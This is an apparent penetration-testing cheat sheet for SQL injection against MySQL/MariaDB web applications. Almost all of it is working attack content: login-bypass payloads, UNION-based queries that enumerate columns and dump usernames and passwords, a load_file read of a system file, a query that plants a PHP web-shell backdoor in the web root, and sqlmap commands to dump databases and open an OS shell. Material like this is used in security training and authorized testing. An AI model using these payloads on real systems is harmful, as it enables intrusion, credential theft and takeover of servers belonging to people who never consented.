mysql -u root -p'root' -h <TARGET IP> -P 3306
Connect to MSSQL
impacket-mssqlclient Administrator:<PASSWORD>@<TARGET IP> -windows-auth
Basic SQL Syntax
SELECT * FROM users;
SELECT username FROM users WHERE id=1;
$query = "select * from users where username = '$user' and password = '$pass'";
Discover SQLi by inputing ' and "
Authentication Bypass (MariaDB / MySQL)
Return 1 record
SQLi Enumeration
Extracting Data from the Database
From SQL Injection to Code Execution
Automating SQL Injection
Authentication Bypass (MariaDB / MySQL)
admin' or 1=1;#
Return 1 record
admin' or 1=1 LIMIT 1;#
SQLi Enumeration
- Enumerating the Datebase: '
- Enumerating Column Number:
1 ORDER BY 1;#
1 ORDER BY 1,2;#
1 ORDER BY 1,2,3;#
-- IF AN ERROR OCCURE THE TABLE HAS 3 COLUMNS
1 ORDER BY 1,2,3,4;#
- Understanding the Layout of the Output:
1 union all select 1, 2, 3
Extracting Data from the Database
- Version of MariaDB:
1 union all select 1, 2, @@version
- Current database user:
1 union all select 1, 2, user()
- Extract table names:
1 union all select 1, 2, table_name from information_schema.tables
- Extract table columns:
1 union all select 1, 2, column_name from information_schema.columns
where table_name='users'
- Payload to extract the users table:
1 union all select 1, username, password from users
From SQL Injection to Code Execution
- Load files:
1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
- Create a malicius (backdoor) file on the web root:
1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>"
into OUTFILE 'c:/xampp/htdocs/backdoor.php'
- Test id parameter:
sqlmap -u http://example.com/something.php?id=1 -p "id"
- Dump database:
sqlmap -u http://example.com/something.php?id=1 -p "id" --dbms=mysql --dump
- Get a shell:
sqlmap -u http://example.com/something.php?id=1 -p "id" --dbms=mysql --os-shell